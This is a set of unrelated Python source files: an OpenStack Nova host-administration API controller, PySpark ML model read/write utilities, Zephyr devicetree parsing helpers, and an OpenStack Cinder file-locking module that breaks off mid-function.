except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": host_name, "power_action": result}
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node.vcpus,
'memory_mb': compute_node.memory_mb,
'disk_gb': compute_node.local_gb}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node.vcpus_used,
'memory_mb': compute_node.memory_mb_used,
'disk_gb': compute_node.local_gb_used}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Getting usage resource per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
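    # Illustrative example of the mapping built above: two instances owned by
    # project 'demo', each with 1 vCPU, 512 MB of RAM and a 10 GB root disk,
    # would yield
    #     {'demo': {'host': host_name, 'project': 'demo',
    #               'cpu': 2, 'memory_mb': 1024, 'disk_gb': 20}}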
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': {'resource':D},..}
D: {'host': 'hostname','project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
# NOTE(eliqiao): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
host_name = id
try:
compute_node = (
objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host_name))
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in six.itervalues(by_proj_resources):
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.ExtensionDescriptor):
"""Admin-only host administration."""
name = "Hosts"
alias = "os-hosts"
namespace = "http://docs.openstack.org/compute/ext/hosts/api/v1.1"
updated = "2011-06-29T00:00:00Z"
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
collection_actions={'update': 'PUT'},
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import sys
import os
import time
import uuid
import warnings
if sys.version > '3':
basestring = str
unicode = str
long = int
from pyspark import SparkContext, since
from pyspark.ml.common import inherit_doc
from pyspark.sql import SparkSession
def _jvm():
"""
Returns the JVM view associated with SparkContext. Must be called
after SparkContext is initialized.
"""
jvm = SparkContext._jvm
if jvm:
return jvm
else:
raise AttributeError("Cannot load _jvm from SparkContext. Is SparkContext initialized?")
class Identifiable(object):
"""
Object with a unique ID.
"""
def __init__(self):
#: A unique id for the object.
self.uid = self._randomUID()
def __repr__(self):
return self.uid
@classmethod
def _randomUID(cls):
"""
Generate a unique unicode id for the object. The default implementation
concatenates the class name, "_", and the last 20 hex chars of a random UUID.
"""
return unicode(cls.__name__ + "_" + uuid.uuid4().hex[12:])
@inherit_doc
class BaseReadWrite(object):
"""
Base class for MLWriter and MLReader. Stores information about the SparkContext
and SparkSession.
.. versionadded:: 2.3.0
"""
def __init__(self):
self._sparkSession = None
def context(self, sqlContext):
"""
Sets the Spark SQLContext to use for saving/loading.
.. note:: Deprecated in 2.1 and will be removed in 3.0, use session instead.
"""
raise NotImplementedError("Read/Write is not yet implemented for type: %s" % type(self))
def session(self, sparkSession):
"""
Sets the Spark Session to use for saving/loading.
"""
self._sparkSession = sparkSession
return self
@property
def sparkSession(self):
"""
Returns the user-specified Spark Session or the default.
"""
if self._sparkSession is None:
self._sparkSession = SparkSession.builder.getOrCreate()
return self._sparkSession
@property
def sc(self):
"""
Returns the underlying `SparkContext`.
"""
return self.sparkSession.sparkContext
@inherit_doc
class MLWriter(BaseReadWrite):
"""
Utility class that can save ML instances.
.. versionadded:: 2.0.0
"""
def __init__(self):
super(MLWriter, self).__init__()
self.shouldOverwrite = False
def _handleOverwrite(self, path):
from pyspark.ml.wrapper import JavaWrapper
_java_obj = JavaWrapper._new_java_obj("org.apache.spark.ml.util.FileSystemOverwrite")
wrapper = JavaWrapper(_java_obj)
wrapper._call_java("handleOverwrite", path, True, self.sc._jsc.sc())
def save(self, path):
"""Save the ML instance to the input path."""
if self.shouldOverwrite:
self._handleOverwrite(path)
self.saveImpl(path)
def saveImpl(self, path):
"""
save() handles overwriting and then calls this method. Subclasses should override this
method to implement the actual saving of the instance.
"""
raise NotImplementedError("MLWriter is not yet implemented for type: %s" % type(self))
def overwrite(self):
"""Overwrites if the output path already exists."""
self.shouldOverwrite = True
return self
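# Illustrative usage (assuming an ML instance that exposes MLWritable.write(),
# see below): writers are typically chained, e.g.
#     model.write().overwrite().save("/tmp/model")
# overwrite() only flips shouldOverwrite so that save() first clears any existing
# output at the path (via _handleOverwrite) before calling saveImpl().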
@inherit_doc
class JavaMLWriter(MLWriter):
"""
(Private) Specialization of :py:class:`MLWriter` for :py:class:`JavaParams` types
"""
def __init__(self, instance):
super(JavaMLWriter, self).__init__()
_java_obj = instance._to_java()
self._jwrite = _java_obj.write()
def save(self, path):
"""Save the ML instance to the input path."""
if not isinstance(path, basestring):
raise TypeError("path should be a basestring, got type %s" % type(path))
self._jwrite.save(path)
def overwrite(self):
"""Overwrites if the output path already exists."""
self._jwrite.overwrite()
return self
def context(self, sqlContext):
"""
Sets the SQL context to use for saving.
.. note:: Deprecated in 2.1 and will be removed in 3.0, use session instead.
"""
warnings.warn(
"Deprecated in 2.1 and will be removed in 3.0, use session instead.",
DeprecationWarning)
self._jwrite.context(sqlContext._ssql_ctx)
return self
def session(self, sparkSession):
"""Sets the Spark Session to use for saving."""
self._jwrite.session(sparkSession._jsparkSession)
return self
@inherit_doc
class MLWritable(object):
"""
Mixin for ML instances that provide :py:class:`MLWriter`.
.. versionadded:: 2.0.0
"""
def write(self):
"""Returns an MLWriter instance for this ML instance."""
raise NotImplementedError("MLWritable is not yet implemented for type: %r" % type(self))
def save(self, path):
"""Save this ML instance to the given path, a shortcut of 'write().save(path)'."""
self.write().save(path)
@inherit_doc
class JavaMLWritable(MLWritable):
"""
(Private) Mixin for ML instances that provide :py:class:`JavaMLWriter`.
"""
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@inherit_doc
class MLReader(BaseReadWrite):
"""
Utility class that can load ML instances.
.. versionadded:: 2.0.0
"""
def __init__(self):
super(MLReader, self).__init__()
def load(self, path):
"""Load the ML instance from the input path."""
raise NotImplementedError("MLReader is not yet implemented for type: %s" % type(self))
@inherit_doc
class JavaMLReader(MLReader):
"""
(Private) Specialization of :py:class:`MLReader` for :py:class:`JavaParams` types
"""
def __init__(self, clazz):
super(JavaMLReader, self).__init__()
self._clazz = clazz
self._jread = self._load_java_obj(clazz).read()
def load(self, path):
"""Load the ML instance from the input path."""
if not isinstance(path, basestring):
raise TypeError("path should be a basestring, got type %s" % type(path))
java_obj = self._jread.load(path)
if not hasattr(self._clazz, "_from_java"):
raise NotImplementedError("This Java ML type cannot be loaded into Python currently: %r"
% self._clazz)
return self._clazz._from_java(java_obj)
def context(self, sqlContext):
"""
Sets the SQL context to use for loading.
.. note:: Deprecated in 2.1 and will be removed in 3.0, use session instead.
"""
warnings.warn(
"Deprecated in 2.1 and will be removed in 3.0, use session instead.",
DeprecationWarning)
self._jread.context(sqlContext._ssql_ctx)
return self
def session(self, sparkSession):
"""Sets the Spark Session to use for loading."""
self._jread.session(sparkSession._jsparkSession)
return self
@classmethod
def _java_loader_class(cls, clazz):
"""
Returns the full class name of the Java ML instance. The default
implementation replaces "pyspark" by "org.apache.spark" in
the Python full class name.
"""
java_package = clazz.__module__.replace("pyspark", "org.apache.spark")
if clazz.__name__ in ("Pipeline", "PipelineModel"):
# Remove the last package name "pipeline" for Pipeline and PipelineModel.
java_package = ".".join(java_package.split(".")[0:-1])
return java_package + "." + clazz.__name__
@classmethod
def _load_java_obj(cls, clazz):
"""Load the peer Java object of the ML instance."""
java_class = cls._java_loader_class(clazz)
java_obj = _jvm()
for name in java_class.split("."):
java_obj = getattr(java_obj, name)
return java_obj
@inherit_doc
class MLReadable(object):
"""
Mixin for instances that provide :py:class:`MLReader`.
.. versionadded:: 2.0.0
"""
@classmethod
def read(cls):
"""Returns an MLReader instance for this class."""
raise NotImplementedError("MLReadable.read() not implemented for type: %r" % cls)
@classmethod
def load(cls, path):
"""Reads an ML instance from the input path, a shortcut of `read().load(path)`."""
return cls.read().load(path)
@inherit_doc
class JavaMLReadable(MLReadable):
"""
(Private) Mixin for instances that provide JavaMLReader.
"""
@classmethod
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@inherit_doc
class JavaPredictionModel():
"""
(Private) Java Model for prediction tasks (regression and classification).
To be mixed in with class:`pyspark.ml.JavaModel`
"""
@property
@since("2.1.0")
def numFeatures(self):
"""
Returns the number of features the model was trained on. If unknown, returns -1
"""
return self._call_java("numFeatures")
@inherit_doc
class DefaultParamsWritable(MLWritable):
"""
.. note:: DeveloperApi
Helper trait for making simple :py:class:`Params` types writable. If a :py:class:`Params`
class stores all data as :py:class:`Param` values, then extending this trait will provide
a default implementation of writing saved instances of the class.
This only handles simple :py:class:`Param` types; e.g., it will not handle
:py:class:`Dataset`. See :py:class:`DefaultParamsReadable`, the counterpart to this trait.
.. versionadded:: 2.3.0
"""
def write(self):
"""Returns a DefaultParamsWriter instance for this class."""
from pyspark.ml.param import Params
if isinstance(self, Params):
return DefaultParamsWriter(self)
else:
raise TypeError("Cannot use DefautParamsWritable with type %s because it does not " +
" extend Params.", type(self))
@inherit_doc
class DefaultParamsWriter(MLWriter):
"""
.. note:: DeveloperApi
Specialization of :py:class:`MLWriter` for :py:class:`Params` types
Class for writing Estimators and Transformers whose parameters are JSON-serializable.
.. versionadded:: 2.3.0
"""
def __init__(self, instance):
super(DefaultParamsWriter, self).__init__()
self.instance = instance
def saveImpl(self, path):
DefaultParamsWriter.saveMetadata(self.instance, path, self.sc)
@staticmethod
def saveMetadata(instance, path, sc, extraMetadata=None, paramMap=None):
"""
Saves metadata + Params to: path + "/metadata"
- class
- timestamp
- sparkVersion
- uid
- paramMap
- (optionally, extra metadata)
:param extraMetadata: Extra metadata to be saved at same level as uid, paramMap, etc.
:param paramMap: If given, this is saved in the "paramMap" field.
"""
metadataPath = os.path.join(path, "metadata")
metadataJson = DefaultParamsWriter._get_metadata_to_save(instance,
sc,
extraMetadata,
paramMap)
sc.parallelize([metadataJson], 1).saveAsTextFile(metadataPath)
@staticmethod
def _get_metadata_to_save(instance, sc, extraMetadata=None, paramMap=None):
"""
Helper for :py:meth:`DefaultParamsWriter.saveMetadata` which extracts the JSON to save.
This is useful for ensemble models which need to save metadata for many sub-models.
.. note:: See :py:meth:`DefaultParamsWriter.saveMetadata` for details on what this includes.
"""
uid = instance.uid
cls = instance.__module__ + '.' + instance.__class__.__name__
params = instance.extractParamMap()
jsonParams = {}
if paramMap is not None:
jsonParams = paramMap
else:
for p in params:
jsonParams[p.name] = params[p]
basicMetadata = {"class": cls, "timestamp": long(round(time.time() * 1000)),
"sparkVersion": sc.version, "uid": uid, "paramMap": jsonParams}
if extraMetadata is not None:
basicMetadata.update(extraMetadata)
return json.dumps(basicMetadata, separators=[',', ':'])
@inherit_doc
class DefaultParamsReadable(MLReadable):
"""
.. note:: DeveloperApi
Helper trait for making simple :py:class:`Params` types readable.
If a :py:class:`Params` class stores all data as :py:class:`Param` values,
then extending this trait will provide a default implementation of reading saved
instances of the class. This only handles simple :py:class:`Param` types;
e.g., it will not handle :py:class:`Dataset`. See :py:class:`DefaultParamsWritable`,
the counterpart to this trait.
.. versionadded:: 2.3.0
"""
@classmethod
def read(cls):
"""Returns a DefaultParamsReader instance for this class."""
return DefaultParamsReader(cls)
@inherit_doc
class DefaultParamsReader(MLReader):
"""
.. note:: DeveloperApi
Specialization of :py:class:`MLReader` for :py:class:`Params` types
Default :py:class:`MLReader` implementation for transformers and estimators that
contain basic (json-serializable) params and no data. This will not handle
more complex params or types with data (e.g., models with coefficients).
.. versionadded:: 2.3.0
"""
def __init__(self, cls):
super(DefaultParamsReader, self).__init__()
self.cls = cls
@staticmethod
def __get_class(clazz):
"""
Loads Python class from its name.
"""
parts = clazz.split('.')
module = ".".join(parts[:-1])
m = __import__(module)
for comp in parts[1:]:
m = getattr(m, comp)
return m
def load(self, path):
metadata = DefaultParamsReader.loadMetadata(path, self.sc)
py_type = DefaultParamsReader.__get_class(metadata['class'])
instance = py_type()
instance._resetUid(metadata['uid'])
DefaultParamsReader.getAndSetParams(instance, metadata)
return instance
@staticmethod
def loadMetadata(path, sc, expectedClassName=""):
"""
Load metadata saved using :py:meth:`DefaultParamsWriter.saveMetadata`
:param expectedClassName: If non empty, this is checked against the loaded metadata.
"""
metadataPath = os.path.join(path, "metadata")
metadataStr = sc.textFile(metadataPath, 1).first()
loadedVals = DefaultParamsReader._parseMetaData(metadataStr, expectedClassName)
return loadedVals
@staticmethod
def _parseMetaData(metadataStr, expectedClassName=""):
"""
Parse metadata JSON string produced by :py:meth:`DefaultParamsWriter._get_metadata_to_save`.
This is a helper function for :py:meth:`DefaultParamsReader.loadMetadata`.
:param metadataStr: JSON string of metadata
:param expectedClassName: If non empty, this is checked against the loaded metadata.
"""
metadata = json.loads(metadataStr)
className = metadata['class']
if len(expectedClassName) > 0:
assert className == expectedClassName, "Error loading metadata: Expected " + \
"class name {} but found class name {}".format(expectedClassName, className)
return metadata
@staticmethod
def getAndSetParams(instance, metadata):
"""
Extract Params from metadata, and set them in the instance.
"""
for paramName in metadata['paramMap']:
param = instance.getParam(paramName)
paramValue = metadata['paramMap'][paramName]
instance.set(param, paramValue)
@staticmethod
def loadParamsInstance(path, sc):
"""
Load a :py:class:`Params` instance from the given path, and return it.
This assumes the instance inherits from :py:class:`MLReadable`.
"""
metadata = DefaultParamsReader.loadMetadata(path, sc)
pythonClassName = metadata['class'].replace("org.apache.spark", "pyspark")
py_type = DefaultParamsReader.__get_class(pythonClassName)
instance = py_type.load(path)
return instance
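# Illustrative sketch (assumptions: an active SparkSession and a hypothetical
# Params subclass; none of this is part of the module above). A stage that keeps
# all of its state in Param values can reuse the default reader/writer mixins:
#
#     from pyspark.ml.param import Params, Param
#
#     class MyStage(Params, DefaultParamsWritable, DefaultParamsReadable):
#         threshold = Param(Params._dummy(), "threshold", "cutoff value")
#
#     MyStage().write().overwrite().save("/tmp/my_stage")   # writes .../metadata
#     restored = MyStage.load("/tmp/my_stage")              # DefaultParamsReader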
|
|
#
# Copyright (c) 2017 Linaro
# Copyright (c) 2017 Bobby Noelte
#
# SPDX-License-Identifier: Apache-2.0
#
from collections import defaultdict
from copy import deepcopy
# globals
phandles = {}
aliases = defaultdict(list)
chosen = {}
reduced = {}
defs = {}
structs = {}
bindings = {}
bus_bindings = {}
bindings_compat = []
old_alias_names = False
regs_config = {
'zephyr,flash' : 'CONFIG_FLASH',
'zephyr,sram' : 'CONFIG_SRAM',
'zephyr,ccm' : 'CONFIG_CCM'
}
name_config = {
'zephyr,console' : 'CONFIG_UART_CONSOLE_ON_DEV_NAME',
'zephyr,shell-uart' : 'CONFIG_UART_SHELL_ON_DEV_NAME',
'zephyr,bt-uart' : 'CONFIG_BT_UART_ON_DEV_NAME',
'zephyr,uart-pipe' : 'CONFIG_UART_PIPE_ON_DEV_NAME',
'zephyr,bt-mon-uart' : 'CONFIG_BT_MONITOR_ON_DEV_NAME',
'zephyr,uart-mcumgr' : 'CONFIG_UART_MCUMGR_ON_DEV_NAME'
}
def convert_string_to_label(s):
# Transmute ,-@/ to _
s = s.replace("-", "_")
s = s.replace(",", "_")
s = s.replace("@", "_")
s = s.replace("/", "_")
# Uppercase the string
s = s.upper()
return s
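# Illustrative example: convert_string_to_label("soc/uart@4000c000") returns
# "SOC_UART_4000C000"; the separator characters are flattened to '_' and the
# result is upper-cased.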
def get_all_compatibles(d, name, comp_dict):
if 'props' in d:
compat = d['props'].get('compatible')
enabled = d['props'].get('status')
if enabled == "disabled":
return comp_dict
if compat is not None:
comp_dict[name] = compat
if name != '/':
name += '/'
if isinstance(d, dict):
if d['children']:
for k, v in d['children'].items():
get_all_compatibles(v, name + k, comp_dict)
return comp_dict
def get_aliases(root):
if 'children' in root:
if 'aliases' in root['children']:
for k, v in root['children']['aliases']['props'].items():
aliases[v].append(k)
# Treat alternate names as aliases
for k in reduced.keys():
if reduced[k].get('alt_name', None) is not None:
aliases[k].append(reduced[k]['alt_name'])
def get_node_compats(node_address):
compat = None
try:
if 'props' in reduced[node_address].keys():
compat = reduced[node_address]['props'].get('compatible')
if not isinstance(compat, list):
compat = [compat, ]
except:
pass
return compat
def get_compat(node_address):
compat = None
try:
if 'props' in reduced[node_address].keys():
compat = reduced[node_address]['props'].get('compatible')
if compat == None:
compat = find_parent_prop(node_address, 'compatible')
if isinstance(compat, list):
compat = compat[0]
except:
pass
return compat
def get_chosen(root):
if 'children' in root:
if 'chosen' in root['children']:
for k, v in root['children']['chosen']['props'].items():
chosen[k] = v
def get_phandles(root, name, handles):
if 'props' in root:
handle = root['props'].get('phandle')
enabled = root['props'].get('status')
if enabled == "disabled":
return
if handle is not None:
phandles[handle] = name
if name != '/':
name += '/'
if isinstance(root, dict):
if root['children']:
for k, v in root['children'].items():
get_phandles(v, name + k, handles)
def insert_defs(node_address, new_defs, new_aliases):
for key in new_defs.keys():
if key.startswith('DT_COMPAT_'):
node_address = 'compatibles'
if node_address in defs:
if 'aliases' in defs[node_address]:
defs[node_address]['aliases'].update(new_aliases)
else:
defs[node_address]['aliases'] = new_aliases
defs[node_address].update(new_defs)
else:
new_defs['aliases'] = new_aliases
defs[node_address] = new_defs
def find_node_by_path(nodes, path):
d = nodes
for k in path[1:].split('/'):
d = d['children'][k]
return d
def get_reduced(nodes, path):
# compress nodes list to nodes w/ paths, add interrupt parent
if 'props' in nodes:
status = nodes['props'].get('status')
if status == "disabled":
return
if isinstance(nodes, dict):
reduced[path] = dict(nodes)
reduced[path].pop('children', None)
if path != '/':
path += '/'
if nodes['children']:
for k, v in nodes['children'].items():
get_reduced(v, path + k)
def get_node_label(node_address):
node_compat = get_compat(node_address)
def_label = convert_string_to_label(node_compat)
if '@' in node_address:
# See if we have number we can convert
try:
unit_addr = int(node_address.split('@')[-1], 16)
(nr_addr_cells, nr_size_cells) = get_addr_size_cells(node_address)
unit_addr += translate_addr(unit_addr, node_address,
nr_addr_cells, nr_size_cells)
unit_addr = "%x" % unit_addr
except:
unit_addr = node_address.split('@')[-1]
def_label += '_' + convert_string_to_label(unit_addr)
else:
def_label += '_' + \
convert_string_to_label(node_address.split('/')[-1])
return def_label
def get_parent_address(node_address):
parent_address = ''
for comp in node_address.split('/')[1:-1]:
parent_address += '/' + comp
return parent_address
def find_parent_prop(node_address, prop):
parent_address = get_parent_address(node_address)
if prop in reduced[parent_address]['props']:
parent_prop = reduced[parent_address]['props'].get(prop)
else:
raise Exception("Parent of node " + node_address +
" has no " + prop + " property")
return parent_prop
# Get the #{address,size}-cells for a given node
def get_addr_size_cells(node_address):
parent_addr = get_parent_address(node_address)
if parent_addr == '':
parent_addr = '/'
# The DT spec says that if #address-cells is missing default to 2
# if #size-cells is missing default to 1
nr_addr = reduced[parent_addr]['props'].get('#address-cells', 2)
nr_size = reduced[parent_addr]['props'].get('#size-cells', 1)
return (nr_addr, nr_size)
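# Illustrative example: for a node whose parent declares
#     #address-cells = <1>; #size-cells = <1>;
# get_addr_size_cells() returns (1, 1); if the parent omits both properties it
# falls back to (2, 1), matching the DT spec defaults noted above.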
def translate_addr(addr, node_address, nr_addr_cells, nr_size_cells):
try:
ranges = deepcopy(find_parent_prop(node_address, 'ranges'))
if type(ranges) is not list: ranges = [ ]
except:
return 0
parent_address = get_parent_address(node_address)
(nr_p_addr_cells, nr_p_size_cells) = get_addr_size_cells(parent_address)
range_offset = 0
while ranges:
child_bus_addr = 0
parent_bus_addr = 0
range_len = 0
for x in range(nr_addr_cells):
val = ranges.pop(0) << (32 * (nr_addr_cells - x - 1))
child_bus_addr += val
for x in range(nr_p_addr_cells):
val = ranges.pop(0) << (32 * (nr_p_addr_cells - x - 1))
parent_bus_addr += val
for x in range(nr_size_cells):
range_len += ranges.pop(0) << (32 * (nr_size_cells - x - 1))
# apply the offset only if the address falls within this child range;
# otherwise no translation is needed at this level
if child_bus_addr <= addr <= (child_bus_addr + range_len):
range_offset = parent_bus_addr - child_bus_addr
break
parent_range_offset = translate_addr(addr + range_offset,
parent_address, nr_p_addr_cells, nr_p_size_cells)
range_offset += parent_range_offset
return range_offset
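# Illustrative example (conceptual only, since translate_addr() reads the global
# 'reduced' tree): with a parent 'ranges' of <0x0 0x40000000 0x1000> and one cell
# each for the child address, parent address and size, an address of 0x100 falls
# inside the 0x0..0x1000 window, so this level contributes an offset of
# 0x40000000 - 0x0 = 0x40000000, plus whatever the grandparent level adds
# recursively.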
def enable_old_alias_names(enable):
global old_alias_names
old_alias_names = enable
def add_prop_aliases(node_address,
alias_label_function, prop_label, prop_aliases):
node_compat = get_compat(node_address)
new_alias_prefix = 'DT_' + convert_string_to_label(node_compat)
for alias in aliases[node_address]:
old_alias_label = alias_label_function(alias)
new_alias_label = new_alias_prefix + '_' + old_alias_label
if (new_alias_label != prop_label):
prop_aliases[new_alias_label] = prop_label
if (old_alias_names and old_alias_label != prop_label):
prop_aliases[old_alias_label] = prop_label
def get_binding(node_address):
compat = get_compat(node_address)
# For now, just look for the binding in the main dict;
# if we find it here, return it, otherwise it had better
# be in the bus specific dict
if compat in bindings:
return bindings[compat]
parent_addr = get_parent_address(node_address)
parent_compat = get_compat(parent_addr)
parent_binding = bindings[parent_compat]
bus = parent_binding['child']['bus']
binding = bus_bindings[bus][compat]
return binding
def get_binding_compats():
return bindings_compat
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import functools
import os
import shutil
import tempfile
import time
import weakref
from eventlet import semaphore
from oslo.config import cfg
from cinder.openstack.common import fileutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import local
from cinder.openstack.common import log as logging
LOG = logging.getLogger(__name__)
util_opts = [
cfg.BoolOpt('disable_process_locking', default=False,
help='Whether to disable inter-process locks'),
cfg.StrOpt('lock_path',
               help=('Directory to use for lock files. Defaults to a '
'temp directory'))
]
CONF = cfg.CONF
CONF.register_opts(util_opts)
def set_defaults(lock_path):
cfg.set_defaults(util_opts, lock_path=lock_path)
class _InterProcessLock(object):
"""Lock implementation which allows multiple locks, working around
issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
not require any cleanup. Since the lock is always held on a file
descriptor rather than outside of the process, the lock gets dropped
automatically if the process crashes, even if __exit__ is not executed.
There are no guarantees regarding usage by multiple green threads in a
single process here. This lock works only between processes. Exclusive
access between local threads should be achieved using the semaphores
in the @synchronized decorator.
Note these locks are released when the descriptor is closed, so it's not
safe to close the file descriptor while another green thread holds the
lock. Just opening and closing the lock file can break synchronisation,
so lock files must be accessed only using this abstraction.
"""
def __init__(self, name):
self.lockfile = None
self.fname = name
def __enter__(self):
self.lockfile = open(self.fname, 'w')
while True:
try:
# Using non-blocking locks since green threads are not
# patched to deal with blocking locking calls.
# Also upon reading the MSDN docs for locking(), it seems
# to have a laughable 10 attempts "blocking" mechanism.
self.trylock()
return self
except IOError as e:
if e.errno in (errno.EACCES, errno.EAGAIN):
# external locks synchronise things like iptables
# updates - give it some time to prevent busy spinning
time.sleep(0.01)
else:
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.unlock()
self.lockfile.close()
except IOError:
LOG.exception(_("Could not release the acquired lock `%s`"),
self.fname)
def trylock(self):
raise NotImplementedError()
def unlock(self):
raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
def trylock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_NBLCK, 1)
def unlock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
def trylock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
if os.name == 'nt':
import msvcrt
InterProcessLock = _WindowsLock
else:
import fcntl
InterProcessLock = _PosixLock
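# Editor's illustrative sketch, not part of the original module: the
# platform-specific class chosen above is a context manager.  The lock-file
# path used here is hypothetical and would normally live under CONF.lock_path.
def _example_interprocess_lock(path='/tmp/example.lock'):
    with InterProcessLock(path):
        # Only one process at a time gets past this point for the same path.
        # The fcntl/msvcrt lock is released on exit, or automatically if the
        # process dies, because it is tied to the open file descriptor.
        pass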
_semaphores = weakref.WeakValueDictionary()
def synchronized(name, lock_file_prefix, external=False, lock_path=None):
"""Synchronization decorator.
Decorating a method like so::
@synchronized('mylock')
def foo(self, *args):
...
ensures that only one thread will execute the foo method at a time.
Different methods can share the same lock::
@synchronized('mylock')
def foo(self, *args):
...
@synchronized('mylock')
def bar(self, *args):
...
This way only one of either foo or bar can be executing at a time.
:param lock_file_prefix: The lock_file_prefix argument is used to provide
lock files on disk with a meaningful prefix. The prefix should end with a
hyphen ('-') if specified.
:param external: The external keyword argument denotes whether this lock
should work across multiple processes. This means that if two different
    workers both run a method decorated with @synchronized('mylock',
external=True), only one of them will execute at a time.
:param lock_path: The lock_path keyword argument is used to specify a
special location for external lock files to live. If nothing is set, then
CONF.lock_path is used as a default.
"""
def wrap(f):
@functools.wraps(f)
def inner(*args, **kwargs):
# NOTE(soren): If we ever go natively threaded, this will be racy.
            # See http://stackoverflow.com/questions/5390569/dynamically-allocating-and-destroying-mutexes
sem = _semaphores.get(name, semaphore.Semaphore())
if name not in _semaphores:
                # This check is not racy: we already hold a local reference,
                # so GC cannot drop the entry, and there has been no I/O
                # switch since the get() above (only valid in greenthreads).
_semaphores[name] = sem
with sem:
LOG.debug(_('Got semaphore "%(lock)s" for method '
'"%(method)s"...'), {'lock': name,
'method': f.__name__})
# NOTE(mikal): I know this looks odd
if not hasattr(local.strong_store, 'locks_held'):
local.strong_store.locks_held = []
local.strong_store.locks_held.append(name)
try:
if external and not CONF.disable_process_locking:
LOG.debug(_('Attempting to grab file lock "%(lock)s" '
'for method "%(method)s"...'),
{'lock': name, 'method': f.__name__})
cleanup_dir = False
# We need a copy of lock_path because it is non-local
local_lock_path = lock_path
if not local_lock_path:
local_lock_path = CONF.lock_path
if not local_lock_path:
cleanup_dir = True
local_lock_path = tempfile.mkdtemp()
if not os.path.exists(local_lock_path):
fileutils.ensure_tree(local_lock_path)
# NOTE(mikal): the lock name cannot contain directory
# separators
safe_name = name.replace(os.sep, '_')
lock_file_name = '%s%s' % (lock_file_prefix, safe_name)
lock_file_path = os.path.join(local_lock_path,
lock_file_name)
try:
